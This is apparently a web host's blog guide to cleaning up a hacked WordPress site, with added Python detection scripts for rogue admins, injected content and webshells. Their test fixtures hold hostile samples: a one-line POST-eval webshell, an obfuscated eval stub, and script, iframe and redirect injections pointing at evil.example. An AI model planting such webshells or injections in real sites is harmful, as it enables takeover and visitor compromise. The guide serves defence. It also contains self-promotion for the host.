I will never forget the panic in my friend's voice when he called me to say that he thought his website had been hacked.
It hadn't been long since he'd launched his online store. It was a drop-shipping business, and he'd done a pretty good job of cobbling the site together using WordPress, WooCommerce, and a bunch of other plugins. The business was finally starting to get some traction. But now, in place of the store, was a simple message from Google:
This site may be hacked.
Not the sort of message that instills confidence in your average shopper!
We were very fortunate that his hosting company had a backup, so I was able to help him get things restored. It took several hours, and then several days more for the warnings to disappear from the website and from Google search results.
The long-term damage was hard to estimate: he'd lost money on his pay-per-click advertising, and who knows how many customers would never return. (Of course, I convinced him to move to Kualo, as thanks to our security this kind of incident is extremely rare here.)
Fortunately, his business is now doing well, but seeing him recently reminded me of this incident, and I decided to write a short guide in the hope that it may be useful to other people. It is meant to be a quick, easy-to-follow guide to recovering a hacked WordPress website and protecting it in the future. As you probably know, prevention is always better than cure: securing your website in the first place is much easier than fixing it later on.
Once you've followed the steps below, we strongly recommend reading our complete guide on how to protect your WordPress.
Before we start, though, let's answer one crucial question:
How do WordPress websites get hacked in the first place?
Most WordPress hacking incidents occur primarily because of a combination of two factors:
- Outdated themes and plugins
- Poorly protected web hosting
If you run an outdated plugin or theme, its vulnerabilities will eventually be published, and attackers scan the web for sites still running the vulnerable version, so it's almost inevitable that your site will be hit. The same goes for nulled (pirated) themes and plugins: it's almost a guarantee that somebody has left a backdoor in them to use later as they please.
This is why every security guide on WordPress always recommends keeping everything updated!
Web hosting gets far less discussion, yet it is another critical piece of the puzzle. Choosing a reputable, secure host matters because hosting providers do a lot of work behind the scenes to protect their customers' websites.
With shared hosting this is especially critical, since you share the server with other websites; if one of them is compromised and the accounts are not isolated from each other, the infection can spread to every other site on that server.
If your website gets hacked, it's always a good idea to consider whether you need a more secure solution when it comes to hosting. Do your research and see what other hosting providers offer and what security measures they have in place.
Let me give you an example of our own security features and what you should be looking for. On our servers, each customer is completely isolated in a caged filesystem, which means that if one customer’s website is compromised, it can’t affect another. As crazy as it seems, this still isn’t the case at every hosting company.
Our servers are further protected by multiple security layers, including a web application firewall, intrusion detection and prevention systems and real-time malware scanning. What's more, each day our Patchman tool rolls out thousands of patches to websites on our fleet of servers, helping ensure that WordPress installations and the most popular plugins are not vulnerable, even if the site owner didn't update!
In other words, making sure that these two factors are addressed after you fix your hacked website will dramatically increase your website's level of protection.
And now, let's dive into the practical part of our guide:
How to Fix a Hacked WordPress Website
1. Restore a backup
Restoring a backup should be your immediate reaction if you discover you've been hacked. You may have already done this for other reasons, but if you don't know what a website backup is, it's basically a snapshot of all your website's data: files, database, design, text, images, styling, etc.
You can start by restoring a backup of your files only. Your database stores things like eCommerce orders, so those will remain intact if you restore just the files. Bear in mind, though, that the database can carry part of the infection too: attackers commonly add an extra administrator account, plant scripts in posts or widget text, or change the site URL so that visitors are redirected elsewhere. After a files-only restore, check the users list and the site address settings before you consider the site clean.
Usually, reputable hosting providers make daily backups of your site, which means that you can restore it yourself or ask them for assistance. They may also offer additional backup services - we have CodeGuard - which allow you to have better control over the backup process.
Of course, the restore point should be from before the time of the hacking incident, and since you may not know precisely when that was, a few attempts might be necessary.
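The database checks mentioned above, as an added example that is not code from the original article. The SQL is what you would run against the live MySQL database through phpMyAdmin in cPanel or the mysql client; sqlite3 with a few constructed rows stands in for MySQL here only so that the example runs offline. It assumes the default `wp_` table prefix (which is also the prefix of the `wp_capabilities` meta key) and that `owner` is the only account that should hold the administrator role; adjust both for your site.

```python
"""Spot database-level remnants of a WordPress compromise after a files-only restore.

Added example (not from the article). Assumes the default wp_ table prefix.
"""
import sqlite3

# Logins you know should hold the administrator role (assumption for this example).
# Anything else with that role is a candidate rogue account.
KNOWN_ADMINS = {"owner"}

# WordPress stores a user's roles as a serialised PHP array in the wp_capabilities
# meta value, so a simple LIKE is enough to find every administrator.
ADMIN_ACCOUNTS_SQL = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""

# Injected <script>/<iframe> markup in options or post content, and a changed
# siteurl/home, are the usual database-side symptoms.
INJECTED_OPTIONS_SQL = """
SELECT option_name FROM wp_options
WHERE option_value LIKE '%<script%' OR option_value LIKE '%<iframe%' OR option_value LIKE '%eval(%'
"""
INJECTED_POSTS_SQL = """
SELECT ID, post_title FROM wp_posts
WHERE post_content LIKE '%<script%' OR post_content LIKE '%<iframe%'
"""
SITE_URLS_SQL = "SELECT option_name, option_value FROM wp_options WHERE option_name IN ('siteurl', 'home')"


def unexpected_admins(conn, known=KNOWN_ADMINS):
    """Return (login, email, registered) for administrator accounts you did not create."""
    rows = conn.execute(ADMIN_ACCOUNTS_SQL).fetchall()
    return [(login, email, reg) for _id, login, email, reg in rows if login not in known]


def injected_content(conn, expected_url):
    """Return (where, what) findings for injected markup and site URL tampering."""
    findings = [("wp_options", name) for (name,) in conn.execute(INJECTED_OPTIONS_SQL)]
    findings += [("wp_posts", f"{pid}: {title}") for pid, title in conn.execute(INJECTED_POSTS_SQL)]
    for name, value in conn.execute(SITE_URLS_SQL):
        if value != expected_url:
            findings.append(("wp_options", f"{name} changed to {value}"))
    return findings


def constructed_db():
    """In-memory stand-in for a compromised shop's tables. All rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
    CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT);
    CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
    CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_content TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", [
        (1, "owner", "owner@example.com", "2020-05-01 10:00:00"),
        (2, "shopstaff", "staff@example.com", "2020-06-15 09:30:00"),
        (7, "wp-support", "support@evil.example", "2021-04-12 03:14:00"),  # planted by the attacker
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?)", [
        (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, "wp_capabilities", 'a:1:{s:12:"shop_manager";b:1;}'),
        (7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?,?)", [
        ("siteurl", "https://shop.example"),
        ("home", "https://evil.example/redirect"),  # tampered: visitors get redirected
        ("blogname", "My Shop"),
        ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:49:"<script src="https://evil.example/m.js"></script>";}}'),
    ])
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", [
        (10, "Welcome", "<p>Welcome to the shop.</p>"),
        (11, "Shoes", '<p>Great shoes.</p><iframe src="https://evil.example/x" width="0"></iframe>'),
    ])
    return conn


if __name__ == "__main__":
    db = constructed_db()
    print("rogue administrators:", unexpected_admins(db))
    print("injected content:", injected_content(db, "https://shop.example"))
```

Delete any administrator you did not create, reset the passwords of the ones you did, and restore the original `siteurl` and `home` values; injected widget text and post content can be edited out in the WordPress admin once the files are clean.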
2. Scan and remove malicious code
For a malware-related hacking incident, you'll need to remove the malware from your website.
An easy way is to scan your WordPress installation with a malware scanner (check some recommended scanners here) and deal with every flagged file. Users who aren't tech-savvy may worry about doing this themselves, but a scanner points you to the specific files that need attention. Do check each one before deleting it: a modified WordPress core or plugin file should be replaced with a clean copy rather than removed outright, and scanners do occasionally flag legitimate code.
It's worth noting that if your hosting provider offers a specialised solution (as we do), a third-party malware scanner may be redundant.
Once you have a complete list of the infected files, you can access your website files either via FTP (follow this link for an FTP use guide) or through the File Manager in cPanel (follow this link for a File Manager guide) and remove or replace them as indicated.
Some security plugins also offer this; one of the most popular is Wordfence. It also provides live monitoring, login attempt limiting, spam comment filtering, a firewall and more, so it's definitely worth keeping the plugin even after you've performed your scan.
A lesser-known but equally capable option is WP Cerber. The two offer very similar security features, but their interfaces differ, and some may prefer one to the other.
Once you have cleaned your website, make sure to make a manual backup copy of your website! If you don't know how to do it, follow this guide to back up your site.
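If you are comfortable with a script, the triage scan below shows what a malware scanner is actually looking for. It is an added example, not code from the article or from any of the scanners mentioned: it walks a copy of the site's files (downloaded via FTP, or run directly over SSH on the host) and reports PHP files sitting in the uploads folder, files containing a few common obfuscation and webshell idioms, and files changed in the last week. The signature list and the miniature site tree it builds are constructed for illustration; a real scanner carries a far larger signature database.

```python
"""Triage scan of a WordPress document root for common infection indicators.

Added example (not from the article). Assumes the site's files are readable on local disk.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Obfuscation and webshell idioms that legitimate plugin code almost never contains.
# Short constructed list for illustration, not a full signature database.
SIGNATURES = {
    "eval-of-decoded-string": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "request-param-executed": re.compile(
        rb"(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    # Long base64 blobs are only a hint: some legitimate plugins embed fonts or images this way.
    "long-base64-blob": re.compile(rb"[A-Za-z0-9+/]{300,}={0,2}"),
}
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")
UPLOAD_DIRS = ("wp-content/uploads",)  # should hold media only, never executable PHP


def scan_site(root, recent_days=7):
    """Walk a WordPress tree and return sorted (reason, relative_path) findings."""
    root = Path(root)
    cutoff = time.time() - recent_days * 86400
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        is_php = path.suffix.lower() in PHP_SUFFIXES
        if is_php and any(rel.startswith(d + "/") for d in UPLOAD_DIRS):
            findings.add(("php-in-uploads", rel))
        # Recently changed files narrow the search; right after a restore this will
        # light up everything, so run the scan before restoring or use a later cutoff.
        if path.stat().st_mtime > cutoff:
            findings.add(("recently-modified", rel))
        if is_php:
            data = path.read_bytes()
            for reason, pattern in SIGNATURES.items():
                if pattern.search(data):
                    findings.add((reason, rel))
    return sorted(findings)


def build_fixture():
    """Create a constructed miniature site tree in a temp dir and return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    old = time.time() - 90 * 86400  # legitimate files untouched for three months
    files = {
        "wp-config.php": (b"<?php define('DB_NAME', 'shop');\n", old),
        "wp-content/plugins/shop-helper/helper.php": (b"<?php add_action('init', 'shop_init');\n", old),
        "wp-content/uploads/2021/03/product.jpg": (b"\xff\xd8\xff\xe0 jpeg bytes", old),
        # dropped webshell disguised as an image-handling script (modified now)
        "wp-content/uploads/2021/03/img.php": (b"<?php eval($_POST['c']);\n", None),
        # infected theme file: payload hidden behind base64 + gzinflate (modified now)
        "wp-content/themes/storefront/footer.php": (
            b"<?php eval(gzinflate(base64_decode('" + b"QUJD" * 100 + b"'))); ?>\n<footer></footer>\n",
            None),
    }
    for rel, (content, mtime) in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
        if mtime is not None:
            os.utime(p, (mtime, mtime))
    return root


if __name__ == "__main__":
    for reason, rel in scan_site(build_fixture()):
        print(f"{reason:24} {rel}")
```

Point `scan_site` at your real document root (the folder containing wp-config.php) and work through the list: a PHP file in uploads is almost always a dropped shell and can go; a flagged theme or plugin file should be compared against a fresh copy of the same version and replaced rather than edited by hand. If WP-CLI is available on your host, `wp core verify-checksums` compares the WordPress core files against the published hashes and is the quickest way to find modified core files, which this script does not attempt.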
3. Update everything immediately
We already mentioned the importance of this. Once you've restored your website and removed the malicious code, you need to make sure you've patched whatever vulnerability the attacker used to get in.
As indicated above, make a fresh backup copy of your WordPress site and then update everything. Sometimes things break after an update: you may get a blank screen, an error message, and so on.
In most cases, this is a plugin compatibility issue, so here's what you can do:
- Restore your newly made (malware-free) backup copy
- Update your plugins one by one, checking that the website works after each update